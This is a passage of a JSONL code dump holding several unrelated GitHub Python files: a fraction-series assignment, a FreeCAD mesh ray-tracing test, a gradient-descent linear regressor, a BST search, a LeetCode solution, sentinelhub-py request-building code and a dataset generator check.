plt.show()\n","repo_name":"eleravera/Lab_TOF","sub_path":"Analysis/pb_histogram.py","file_name":"pb_histogram.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"2085731156","text":"\"\"\"\n CS102 - Programming Assignment 6\n 15.4 - Sum series\n Sean X.\n Monday Nov. 29, 2021\n\n Summary\n This program will compute a formula described in the docstring of the compute function.\n It includes a format fraction helper to convert a fraction to a string.\n\"\"\"\nfrom fractions import Fraction\nfrom typing import Callable\n\n\ndef compute(i: int) -> Fraction:\n \"\"\"Compute using the formula in the description\n\n Compute with the variable i, this formula:\n 1 + ½ + ⅓ + ¼ + ... 
+ ¹⁄ᵢ\n\n Args:\n i: The variable i in the formula\n\n Returns:\n The computed result of the formula\n \"\"\"\n\n return 1 + compute_helper(2, Fraction(0, 1), i + 1)\n\n\ndef compute_helper(i: int, cur: Fraction, target: int) -> Fraction:\n return cur if i == target else compute_helper(i + 1, cur + Fraction(1, i), target)\n\n\ndef format_fraction(fraction: Fraction) -> str:\n \"\"\"Format the fraction with Unicode super/subscript numbers\n\n Args:\n fraction: The fraction to format\n\n Returns:\n The formatted fraction\n \"\"\"\n\n # fmt: off\n symbols: dict[str, dict[int, str] | str] = {\n \"numerator\": {\n 0: \"⁰\", 1: \"¹\", 2: \"²\",\n 3: \"³\", 4: \"⁴\", 5: \"⁵\",\n 6: \"⁶\", 7: \"⁷\", 8: \"⁸\",\n 9: \"⁹\",\n },\n \"denominator\": {\n 0: \"₀\", 1: \"₁\", 2: \"₂\",\n 3: \"₃\", 4: \"₄\", 5: \"₅\",\n 6: \"₆\", 7: \"₇\", 8: \"₈\",\n 9: \"₉\",\n },\n \"slash\": \"⁄\",\n }\n # fmt: on\n\n # Get the whole number part of the fraction as a mixed number\n number: int = fraction.numerator // fraction.denominator\n # Get the left over numerator after making it a mixed number\n remainder: int = fraction.numerator - number * fraction.denominator\n # Make each digit in a number into the super/subscript version of it.\n # I convert it into a string, make it into a list of each char\n # and get the super/subscript version.\n subSupScript: Callable[[int, str], str] = lambda n, l: \"\".join(\n symbols[l][int(s)] for s in list(str(n))\n )\n\n return f\"{number}{subSupScript(remainder, 'numerator')}{symbols['slash']}{subSupScript(fraction.denominator, 'denominator')}\"\n","repo_name":"sean-7777/CS102","sub_path":"Week6/Discussion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36004635087","text":"#script for testing out a kdtree algorithm using freecad kdtrees\n\nimport sys\nimport numpy as np\nfrom scipy.spatial import KDTree\nFreeCADPath = '/usr/lib/freecad-daily-python3/lib'\nsys.path.append(FreeCADPath)\nimport FreeCAD\nimport Mesh\nfrom scipy import spatial\n\n\n#file = '/home/tom/source/test/raysect/cube.stl'\n#file = '/home/tom/source/test/raysect/cube1mm.stl'\n#file = '/home/tom/HEAT/data/NSTX/STLs/T000___3.0mm.stl'\n#file = '/home/tom/HEAT/data/NSTX/STLs/narrowSlice___standardmm.stl'\nfile = '/home/tom/HEAT/data/NSTX/STLs/narrowSlice001___standardmm.stl'\nmesh = Mesh.Mesh(file)\n\n\n#rayOrig = np.array([50.0, -100.0, 50.0])\n#rayTerm = np.array([40.0, 500.0, 50.0])\nrayOrig = np.array([604.928, 0, -1609.06])\nrayTerm = np.array([604.985, 10.56, -1608.35])\n\n\n#triangle = np.asarray(mesh.Facets[0].Points)\n#face centers\n#rayOrig = np.zeros((3))\n#rayOrig[0] = np.sum(triangle[:,0])/3.0\n#rayOrig[1] = np.sum(triangle[:,1])/3.0\n#rayOrig[2] = np.sum(triangle[:,2])/3.0\n#rayTerm = np.asarray(mesh.Facets[0].Normal)\n\n\nrayVec = rayTerm - rayOrig\nrayDist = np.linalg.norm(rayVec)\nrayDir = rayVec / rayDist\n\n#=== Using toroidal angle filter\ndef xyz2cyl(x,y,z):\n \"\"\"\n Converts x,y,z coordinates to r,z,phi\n \"\"\"\n x = np.asarray(x)\n y = np.asarray(y)\n z = np.asarray(z)\n r = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y,x)\n #phi = np.radians(phi)\n return r,z,phi\n\n\nq1 = np.array([rayOrig])\nq2 = np.array([rayTerm])\ni=0\n\ntargetPoints = []\nfor face in mesh.Facets:\n targetPoints.append(face.Points)\n\ntargetPoints = np.asarray(targetPoints)/1000.0 #scale to m\np1 = targetPoints[:,0,:] #point 1 of mesh triangle\np2 = targetPoints[:,1,:] #point 2 of mesh 
+{"seq_id":"36004635087","text":"#script for testing out a kdtree algorithm using freecad kdtrees\n\nimport sys\nimport numpy as np\nfrom scipy.spatial import KDTree\nFreeCADPath = '/usr/lib/freecad-daily-python3/lib'\nsys.path.append(FreeCADPath)\nimport FreeCAD\nimport Mesh\nfrom scipy import spatial\n\n\n#file = '/home/tom/source/test/raysect/cube.stl'\n#file = '/home/tom/source/test/raysect/cube1mm.stl'\n#file = '/home/tom/HEAT/data/NSTX/STLs/T000___3.0mm.stl'\n#file = '/home/tom/HEAT/data/NSTX/STLs/narrowSlice___standardmm.stl'\nfile = '/home/tom/HEAT/data/NSTX/STLs/narrowSlice001___standardmm.stl'\nmesh = Mesh.Mesh(file)\n\n\n#rayOrig = np.array([50.0, -100.0, 50.0])\n#rayTerm = np.array([40.0, 500.0, 50.0])\nrayOrig = np.array([604.928, 0, -1609.06])\nrayTerm = np.array([604.985, 10.56, -1608.35])\n\n\n#triangle = np.asarray(mesh.Facets[0].Points)\n#face centers\n#rayOrig = np.zeros((3))\n#rayOrig[0] = np.sum(triangle[:,0])/3.0\n#rayOrig[1] = np.sum(triangle[:,1])/3.0\n#rayOrig[2] = np.sum(triangle[:,2])/3.0\n#rayTerm = np.asarray(mesh.Facets[0].Normal)\n\n\nrayVec = rayTerm - rayOrig\nrayDist = np.linalg.norm(rayVec)\nrayDir = rayVec / rayDist\n\n#=== Using toroidal angle filter\ndef xyz2cyl(x,y,z):\n \"\"\"\n Converts x,y,z coordinates to r,z,phi\n \"\"\"\n x = np.asarray(x)\n y = np.asarray(y)\n z = np.asarray(z)\n r = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y,x)\n #phi = np.radians(phi)\n return r,z,phi\n\n\nq1 = np.array([rayOrig])\nq2 = np.array([rayTerm])\ni=0\n\ntargetPoints = []\nfor face in mesh.Facets:\n targetPoints.append(face.Points)\n\ntargetPoints = np.asarray(targetPoints)/1000.0 #scale to m\np1 = targetPoints[:,0,:] #point 1 of mesh triangle\np2 = targetPoints[:,1,:] #point 2 of mesh triangle\np3 = targetPoints[:,2,:] #point 3 of mesh triangle\n#Prepare for toroidal angle filtering\nR,Z,phi = xyz2cyl(p1[:,0],p1[:,1],p1[:,2])\nphiP1 = phi\nR,Z,phi = xyz2cyl(p2[:,0],p2[:,1],p2[:,2])\nphiP2 = phi\nR,Z,phi = xyz2cyl(p3[:,0],p3[:,1],p3[:,2])\nphiP3 = phi\n\n#filter by toroidal angle\nR,Z,phi = xyz2cyl(q1[i,0],q1[i,1],q1[i,2])\nphiMin = phi\nR,Z,phi = xyz2cyl(q2[i,0],q2[i,1],q2[i,2])\nphiMax = phi\n\n#target faces outside of this toroidal slice\n#note: np.logical_and(a, b, c) treats the third argument as the `out` array,\n#so chain the three conditions with & instead of passing them all at once\ntest0 = (phiP1 < phiMin) & (phiP2 < phiMin) & (phiP3 < phiMin)\ntest1 = (phiP1 > phiMax) & (phiP2 > phiMax) & (phiP3 > phiMax)\ntest = np.logical_or(test0,test1)\nuse = np.where(~test)[0]\n\n\n#np.logical_and(phiP1 > phiMin, phiP2 < phiMax)\n#np.logical_and(phiP2 > phiMin, phiP2 < phiMax)\n#np.logical_and(phiP3 > phiMin, phiP3 < phiMax)\n#test = np.logical_and(test1,test2,test3)\n#use = np.where(test==True)[0]\n\n\nprint(use)\n\n\n#=== using scipy.spatial.KDTree algorithm\nN_facets = mesh.CountFacets\nx = np.zeros((N_facets,3))\ny = np.zeros((N_facets,3))\nz = np.zeros((N_facets,3))\nfor i,facet in enumerate(mesh.Facets):\n #mesh points\n for j in range(3):\n x[i][j] = facet.Points[j][0]\n y[i][j] = facet.Points[j][1]\n z[i][j] = facet.Points[j][2]\n\nx = x.flatten()\ny = y.flatten()\nz = z.flatten()\n#build the tree directly on the (3*N_facets, 3) vertex array; a meshgrid of\n#all coordinate combinations would be cubic in the vertex count and is not needed\ntree = spatial.KDTree(np.array([x,y,z]).T)\n#indices of mesh vertices within rayDist of the ray origin\nnearby = sorted(tree.query_ball_point(rayOrig, rayDist))\n\n\n#=== using FreeCAD internal algorithm\n#intersect\nintersect = mesh.nearestFacetOnRay((rayOrig[0],rayOrig[1],rayOrig[2]),(rayDir[0],rayDir[1],rayDir[2]))\nidx = list(intersect.keys())[0]\nloc = list(intersect.values())[0]\nnewRay = loc - rayOrig\nprint(intersect)\n# remove self intersections\nmesh1 = mesh.copy()\nfrontFaces = np.array([21])\nmesh1.removeFacets(frontFaces)\nmesh1.nearestFacetOnRay((rayOrig[0],rayOrig[1],rayOrig[2]),(rayDir[0],rayDir[1],rayDir[2]))\n","repo_name":"plasmapotential/scratchPad","sub_path":"accelerationTests/kdTreeMesh.py","file_name":"kdTreeMesh.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
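The KDTree pre-filter in the script above collects every mesh vertex within rayDist of the ray origin. A standalone sketch of that query pattern, on synthetic points rather than the HEAT mesh:

import numpy as np
from scipy import spatial

rng = np.random.default_rng(0)
verts = rng.uniform(-1.0, 1.0, size=(1000, 3))  # stand-in for mesh vertices
tree = spatial.KDTree(verts)

origin = np.zeros(3)
radius = 0.25
# indices of all vertices within `radius` of `origin`
nearby = sorted(tree.query_ball_point(origin, radius))
print(len(nearby), "of", len(verts), "vertices inside the search ball")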
+{"seq_id":"7332734690","text":"import numpy as np\nfrom pandas import read_csv\nimport os\nimport time\n\n'''\nNow that this is working, I want to go through the documentation of np.dot(), work out the linear algebra\nbehind it, and reimplement the gradient computation that way.\n'''\n\nclass simple_linear_regressor:\n\n def __init__(self, X, y, i=1000, lr=.05):\n self.features = X\n self.labels = y\n self.iterations = i\n self.weight = 2\n self.bias = 2\n self.learning_rate = lr\n self.data_length = len(self.features)\n\n def fit_model(self):\n for i in range(self.iterations):\n self.update()\n\n def predict(self, x):\n return (self.weight * x) + self.bias\n\n def weight_derivative(self):\n derivative = -2*self.features*(self.labels - (self.weight*self.features+self.bias))\n return np.sum(derivative)/self.data_length\n\n def bias_derivative(self):\n derivative = -2*(self.labels - (self.weight*self.features+self.bias))\n return np.sum(derivative)/self.data_length\n\n def update(self):\n self.weight = self.weight - self.learning_rate*(self.weight_derivative())\n self.bias = self.bias - self.learning_rate*(self.bias_derivative())\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n ## opening csv file\n cur_directory = os.getcwd()\n weather_path = os.path.join(cur_directory, 'regression_data', 'weatherHistory.csv')\n weather_data = read_csv(weather_path)\n #print(weather_data[:5])\n\n ## getting random distribution of desired data\n humidity_X = np.array(weather_data['Humidity'])\n temp_y = np.array(weather_data['Temperature (C)'])\n\n np.random.seed(seed=1)\n rand_indices = np.array(np.floor(np.random.rand(150) * len(humidity_X)), 'int')\n #print(rand_indices, '\\n')\n\n rand_X = humidity_X[rand_indices]\n #print(rand_X[:3], '\\n')\n\n rand_y = temp_y[rand_indices]\n #print(rand_y[:3], '\\n')\n\n ## Visualizing the data\n plt.scatter(rand_X, rand_y, color = 'red')\n plt.plot()\n plt.title('Relationship of Humidity and Temperature')\n plt.xlabel('Humidity')\n plt.ylabel('Temperature')\n\n\n ## Fitting the regressor and timing it\n start_time = time.time()\n regressor = simple_linear_regressor(rand_X, rand_y, 1500)\n regressor.fit_model()\n total_time = time.time() - start_time\n print(total_time)\n\n\n relevant_range = np.arange(.3, 1.1, .1)\n y_vals = relevant_range * regressor.weight + regressor.bias\n\n plt.plot(relevant_range, y_vals)\n plt.show()\n print(f'{regressor.weight}x + {regressor.bias}')\n","repo_name":"nairod2000/regressors","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12725579618","text":"'''\nQuestion: Find if a value exists in a BST\n\nTime complexity: O(h), the depth of the searched node (O(log n) for a balanced tree)\n'''\n\nimport sys\nsys.path.append(\"./mylib\")\nimport BST\n\n#Create BST\nroot = BST.BSTNode(4)\nvalues = [3,2,1,5,10,7,6,9,15]\nfor x in values:\n BST.insertNode(root, BST.BSTNode(x))\n\n\ndef BSTSearch(root, K):\n if root is None:\n return False\n elif root.data > K:\n return BSTSearch(root.left, K)\n elif root.data < K:\n return BSTSearch(root.right, K)\n else:\n return True\n\nqueries = [15,3,0]\nfor K in queries:\n print(\"%d exists: %s\" % (K, BSTSearch(root, K)))\n","repo_name":"AugustLONG/Code","sub_path":"CC150Python/challenges-masterCC50-Python-good/binary-search-tree-find-value.py","file_name":"binary-search-tree-find-value.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"26216906091","text":"# https://leetcode.com/problems/count-special-quadruplets/\n# 1AC, not quite efficient\nfrom collections import defaultdict\nfrom copy import deepcopy\nfrom typing import List\n\nclass Solution:\n 
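# Approach: prefix pair-sum tables. m2[k] maps every pairwise sum
# nums[a] + nums[b] with a < b <= k to the number of such pairs.
# For each choice of c (= j below) and d (= i below) with c < d, the
# quadruplets ending in (c, d) are exactly the pairs (a, b), b < c,
# whose sum equals nums[d] - nums[c]. Deep-copying the growing table
# at every index makes this cubic in the worst case, hence the
# "not quite efficient" note above.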
def countQuadruplets(self, nums: List[int]) -> int:\n n = len(nums)\n m2 = [defaultdict(int)]\n for i in range(1, n):\n m2.append(deepcopy(m2[-1]))\n for j in range(i):\n m2[-1][nums[i] + nums[j]] += 1\n\n res = 0\n for i in range(3, n):\n for j in range(2, i):\n dt = nums[i] - nums[j]\n if dt in m2[j - 1]:\n res += m2[j - 1][dt]\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1501-2000/1995_count-special-quadruplets_1_AC.py","file_name":"1995_count-special-quadruplets_1_AC.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"447039650","text":"\"\"\"\nImplementation of base Sentinel Hub interfaces\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any\n\nfrom ..base import DataRequest\nfrom ..constants import MimeType, MosaickingOrder, RequestType, ResamplingType\nfrom ..data_collections import DataCollection, OrbitDirection\nfrom ..download import DownloadRequest\nfrom ..geometry import BBox, Geometry\nfrom ..time_utils import RawTimeIntervalType, parse_time_interval, serialize_time\nfrom .utils import _update_other_args\n\n\nclass SentinelHubBaseApiRequest(DataRequest, metaclass=ABCMeta):\n \"\"\"A base class for Sentinel Hub interfaces\"\"\"\n\n _SERVICE_ENDPOINT = \"\"\n payload: dict[str, Any] = {} # noqa: RUF012\n\n @property\n @abstractmethod\n def mime_type(self) -> MimeType:\n \"\"\"The mime type of the request.\"\"\"\n\n def create_request(self) -> None:\n \"\"\"Prepares a download request\"\"\"\n headers = {\"content-type\": MimeType.JSON.get_string(), \"accept\": self.mime_type.get_string()}\n base_url = self._get_base_url()\n self.download_list = [\n DownloadRequest(\n request_type=RequestType.POST,\n url=f\"{base_url}/api/v1/{self._SERVICE_ENDPOINT}\",\n post_values=self.payload,\n data_folder=self.data_folder,\n save_response=bool(self.data_folder),\n data_type=self.mime_type,\n headers=headers,\n use_session=True,\n )\n ]\n\n @staticmethod\n def input_data(\n data_collection: DataCollection,\n *,\n identifier: str | None = None,\n time_interval: RawTimeIntervalType | None = None,\n maxcc: float | None = None,\n mosaicking_order: MosaickingOrder | None = None,\n upsampling: ResamplingType | None = None,\n downsampling: ResamplingType | None = None,\n other_args: dict[str, Any] | None = None,\n ) -> InputDataDict:\n \"\"\"Generate the `input data` part of the request body\n\n :param data_collection: One of supported Process API data collections.\n :param identifier: A collection identifier that can be referred to in the evalscript. Parameter is referenced\n as `\"id\"` in service documentation. To learn more check\n `data fusion documentation `__.\n :param time_interval: A time interval with start and end date of the form YYYY-MM-DDThh:mm:ss or YYYY-MM-DD or\n a datetime object\n :param maxcc: Maximum accepted cloud coverage of an image. Float between 0.0 and 1.0. Default is 1.0.\n :param mosaicking_order: Mosaicking order, which has to be either 'mostRecent', 'leastRecent' or 'leastCC'.\n :param upsampling: A type of upsampling to apply on data\n :param downsampling: A type of downsampling to apply on data\n :param other_args: Additional dictionary of arguments. 
If provided, the resulting dictionary will get updated\n by it.\n :return: A dictionary-like object that also contains additional attributes\n \"\"\"\n input_data_dict: dict[str, Any] = {\n \"type\": data_collection.api_id,\n }\n if identifier:\n input_data_dict[\"id\"] = identifier\n\n data_filters = _get_data_filters(data_collection, time_interval, maxcc, mosaicking_order)\n if data_filters:\n input_data_dict[\"dataFilter\"] = data_filters\n\n processing_params = _get_processing_params(upsampling, downsampling)\n if processing_params:\n input_data_dict[\"processing\"] = processing_params\n\n if other_args:\n _update_other_args(input_data_dict, other_args)\n\n return InputDataDict(input_data_dict, service_url=data_collection.service_url)\n\n @staticmethod\n def bounds(\n bbox: BBox | None = None, geometry: Geometry | None = None, other_args: dict[str, Any] | None = None\n ) -> dict[str, Any]:\n \"\"\"Generate a `bound` part of the API request\n\n :param bbox: Bounding box describing the area of interest.\n :param geometry: Geometry describing the area of interest.\n :param other_args: Additional dictionary of arguments. If provided, the resulting dictionary will get updated\n by it.\n \"\"\"\n if bbox is None and geometry is None:\n raise ValueError(\"'bbox' and/or 'geometry' have to be provided.\")\n\n if bbox and not isinstance(bbox, BBox):\n raise ValueError(\"'bbox' should be an instance of sentinelhub.BBox\")\n\n if geometry and not isinstance(geometry, Geometry):\n raise ValueError(\"'geometry' should be an instance of sentinelhub.Geometry\")\n\n if bbox and geometry and bbox.crs != geometry.crs:\n raise ValueError(\"bbox and geometry should be in the same CRS\")\n\n crs = bbox.crs if bbox else geometry.crs # type: ignore[union-attr]\n\n request_bounds: dict[str, Any] = {\"properties\": {\"crs\": crs.opengis_string}}\n\n if bbox:\n request_bounds[\"bbox\"] = list(bbox)\n\n if geometry:\n request_bounds[\"geometry\"] = geometry.get_geojson(with_crs=False)\n\n if other_args:\n _update_other_args(request_bounds, other_args)\n\n return request_bounds\n\n def _get_base_url(self) -> str:\n \"\"\"It decides which base URL to use. Restrictions from data collection definitions overrule the\n settings from config object. 
In case different collections have different restrictions then\n `SHConfig.sh_base_url` breaks the tie in case it matches one of the data collection URLs.\n \"\"\"\n data_collection_urls = tuple({\n input_data_dict.service_url.rstrip(\"/\")\n for input_data_dict in self.payload[\"input\"][\"data\"]\n if isinstance(input_data_dict, InputDataDict) and input_data_dict.service_url is not None\n })\n config_base_url = self.config.sh_base_url.rstrip(\"/\")\n\n if not data_collection_urls:\n return config_base_url\n\n if len(data_collection_urls) == 1:\n return data_collection_urls[0]\n\n if config_base_url in data_collection_urls:\n return config_base_url\n\n raise ValueError(\n f\"Given data collections are restricted to different services: {data_collection_urls}\\n\"\n \"Configuration parameter sh_base_url cannot break the tie because it is set to a different\"\n f\"service: {config_base_url}\"\n )\n\n\nclass InputDataDict(dict):\n \"\"\"An input data dictionary which also holds additional attributes\"\"\"\n\n def __init__(self, input_data_dict: dict[str, Any], *, service_url: str | None = None):\n \"\"\"\n :param input_data_dict: A normal dictionary with input parameters\n :param service_url: A service URL defined by a data collection\n \"\"\"\n super().__init__(input_data_dict)\n self.service_url = service_url\n\n def __repr__(self) -> str:\n \"\"\"Modified dictionary representation that also shows additional attributes\"\"\"\n normal_dict_repr = super().__repr__()\n return f\"{self.__class__.__name__}({normal_dict_repr}, service_url={self.service_url})\"\n\n\ndef _get_data_filters(\n data_collection: DataCollection,\n time_interval: RawTimeIntervalType | None,\n maxcc: float | None,\n mosaicking_order: MosaickingOrder | None,\n) -> dict[str, Any]:\n \"\"\"Builds a dictionary of data filters for Process API\"\"\"\n data_filter: dict[str, Any] = {}\n\n if time_interval:\n start_time, end_time = serialize_time(parse_time_interval(time_interval, allow_undefined=True), use_tz=True)\n data_filter[\"timeRange\"] = {\"from\": start_time, \"to\": end_time}\n\n if maxcc is not None:\n if maxcc < 0 or maxcc > 1:\n raise ValueError(\"maxcc should be a float on an interval [0, 1]\")\n\n data_filter[\"maxCloudCoverage\"] = int(maxcc * 100)\n\n if mosaicking_order:\n data_filter[\"mosaickingOrder\"] = MosaickingOrder(mosaicking_order).value\n\n return {**data_filter, **_get_data_collection_filters(data_collection)}\n\n\ndef _get_data_collection_filters(data_collection: DataCollection) -> dict[str, Any]:\n \"\"\"Builds a dictionary of filters for Process API from a data collection definition\"\"\"\n filters: dict[str, Any] = {}\n\n if data_collection.swath_mode:\n filters[\"acquisitionMode\"] = data_collection.swath_mode.upper()\n\n if data_collection.polarization:\n filters[\"polarization\"] = data_collection.polarization.upper()\n\n if data_collection.resolution:\n filters[\"resolution\"] = data_collection.resolution.upper()\n\n if data_collection.orbit_direction and data_collection.orbit_direction.upper() != OrbitDirection.BOTH:\n filters[\"orbitDirection\"] = data_collection.orbit_direction.upper()\n\n if data_collection.timeliness:\n filters[\"timeliness\"] = data_collection.timeliness\n\n if data_collection.dem_instance:\n filters[\"demInstance\"] = data_collection.dem_instance\n\n return filters\n\n\ndef _get_processing_params(upsampling: ResamplingType | None, downsampling: ResamplingType | None) -> dict[str, Any]:\n \"\"\"Builds a dictionary of processing parameters for Process API\"\"\"\n 
processing_params: dict[str, Any] = {}\n\n if upsampling:\n processing_params[\"upsampling\"] = ResamplingType(upsampling).value\n\n if downsampling:\n processing_params[\"downsampling\"] = ResamplingType(downsampling).value\n\n return processing_params\n","repo_name":"sentinel-hub/sentinelhub-py","sub_path":"sentinelhub/api/base_request.py","file_name":"base_request.py","file_ext":"py","file_size_in_byte":9526,"program_lang":"python","lang":"en","doc_type":"code","stars":740,"dataset":"github-code","pt":"72"} +{"seq_id":"20657735855","text":"from datasets.vehicles import concat, crowdai, object_detect\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\n\nds = concat([object_detect, crowdai])\n\ntraining_gen = ds.generator(10)\nbatch_img, batch_mask = next(training_gen)\n### Plotting generator output\nfor i in range(10):\n im = np.array(batch_img[i], dtype=np.uint8)\n im_mask = np.array(batch_mask[i], dtype=np.uint8)\n plt.subplot(1, 3, 1)\n plt.imshow(im)\n plt.axis('off')\n plt.subplot(1, 3, 2)\n plt.imshow(im_mask[:, :, 0])\n plt.axis('off')\n plt.subplot(1, 3, 3)\n plt.imshow(cv2.bitwise_and(im, im, mask=im_mask))\n plt.axis('off')\n plt.show()","repo_name":"gregorej/computer-vision-playground","sub_path":"vehicle_recognition/train_generator_check.py","file_name":"train_generator_check.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
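For context on how the `input_data` and `bounds` helpers in the sentinelhub sample above are typically consumed, here is a hedged sketch of a Process API request built with sentinelhub-py's `SentinelHubRequest`; the evalscript, bounding box, and time range are illustrative placeholders, and running it requires configured credentials.

from sentinelhub import CRS, BBox, DataCollection, MimeType, SentinelHubRequest

# trivial true-color evalscript (illustrative only)
evalscript = """
//VERSION=3
function setup() {
  return {input: ["B04", "B03", "B02"], output: {bands: 3}};
}
function evaluatePixel(sample) {
  return [sample.B04, sample.B03, sample.B02];
}
"""

request = SentinelHubRequest(
    evalscript=evalscript,
    input_data=[
        SentinelHubRequest.input_data(  # builds an InputDataDict as defined above
            data_collection=DataCollection.SENTINEL2_L2A,
            time_interval=("2023-06-01", "2023-06-30"),
            maxcc=0.3,
        )
    ],
    responses=[SentinelHubRequest.output_response("default", MimeType.PNG)],
    bbox=BBox((13.35, 45.77, 13.65, 45.95), crs=CRS.WGS84),
    size=(512, 512),
)
# image = request.get_data()[0]  # fetches the rendered tile as a numpy array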